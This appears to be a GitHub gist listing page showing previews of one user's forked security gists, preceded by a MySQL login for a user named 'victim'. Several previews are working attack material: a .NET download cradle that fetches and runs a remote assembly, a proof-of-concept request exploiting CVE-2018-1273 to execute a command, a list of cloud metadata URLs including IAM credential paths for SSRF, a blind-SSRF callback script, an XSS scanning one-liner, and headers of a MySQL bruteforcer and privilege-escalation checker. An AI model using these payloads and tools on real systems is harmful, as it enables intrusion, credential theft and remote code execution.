- mysql: 14.14 Distrib 5.5.14
- host:
127.0.0.1 - port:
3306 - user:
victim - password:
56789
xstpl
/ gist:651f983feb2498cdbeb19b1b3284c49f
Created
December 19, 2016 03:47
— forked from berlinbrown/gist:4583728
Simplest Possible Web Crawler with C++
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //============================================================================ | |
| // Name : OctaneCrawler.cpp | |
| // Author : Berlin Brown (berlin dot brown at gmail.com) | |
| // Version : | |
| // Copyright : Copyright Berlin Brown 2012-2013 | |
| // License : BSD | |
| // Description : This is the simplest possible web crawler in C++ | |
| // Uses boost_regex and boost_algorithm | |
| //============================================================================ |
xstpl
/ mysql_brute.rb
Created
January 11, 2017 22:09
— forked from postmodern/mysql_brute.rb
MySQL Bruteforcer
xstpl
/ DotnetAssemblyDownloadCradle.cs
Created
July 21, 2018 12:00
— forked from cobbr/DotnetAssemblyDownloadCradle.cs
A download cradle for .NET assemblies.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } |
xstpl
/ linuxprivchecker.py
Created
August 6, 2018 18:07
— forked from sh1n0b1/linuxprivchecker.py
linuxprivchecker.py -- a Linux Privilege Escalation Check Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/env python | |
| ############################################################################################################### | |
| ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
| ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
| ##------------------------------------------------------------------------------------------------------------- | |
| ## [Details]: | |
| ## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
| ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
| ## passwords and applicable exploits. |
xstpl
/ CVE-2018-1273.http
Created
August 7, 2018 00:47
— forked from matthiaskaiser/CVE-2018-1273.http
POC for CVE-2018-1273
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /users HTTP/1.1 | |
| Host: localhost:8080 | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 164 | |
| username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf |
xstpl
/ get_dns_records.py
Created
January 15, 2019 14:46
— forked from f0r34chb3t4/get_dns_records.py
Printing all DNS records using DNSPython in Python 3
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding utf-8 -*- | |
| # | |
| # Copyright 2016 Akshay Raj Gollahalli | |
| import dns.resolver | |
| def get_records(domain): | |
| """ |
xstpl
/ cloud_metadata.txt
Created
July 14, 2019 20:07
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
xstpl
/ sslsub.sh
Created
May 12, 2020 13:08
— forked from gwen001/sslsub.sh
get altnames from ssl certificates
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sslsub() { | |
| timeout 3 openssl s_client -showcerts -servername $1 -connect $1:443 <<< "Q" 2>/dev/null | openssl x509 -text -noout | grep DNS | tr ',' '\n' | cut -d ':' -f 2 | sort -fu | |
| } |
xstpl
/ xss_one_liner.md
Created
May 12, 2020 13:14
— forked from cihanmehmet/xss_one_liner.md
xss_one_liner.md
#cat targets_urls.txt
http://public-firing-range.appspot.comgospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
xstpl
/ ssrf.sh
Created
May 12, 2020 13:16
— forked from hussein98d/ssrf.sh
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d" | |
| echo "Usage: bash script.sh domain.com http://server-callbak" | |
| echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls" | |
| if [ -z "$1" ]; then | |
| echo >&2 "ERROR: Domain not set" | |
| exit 2 | |
| fi | |
| if [ -z "$2" ]; then | |
| echo >&2 "ERROR: Sever link not set" | |
| exit 2 |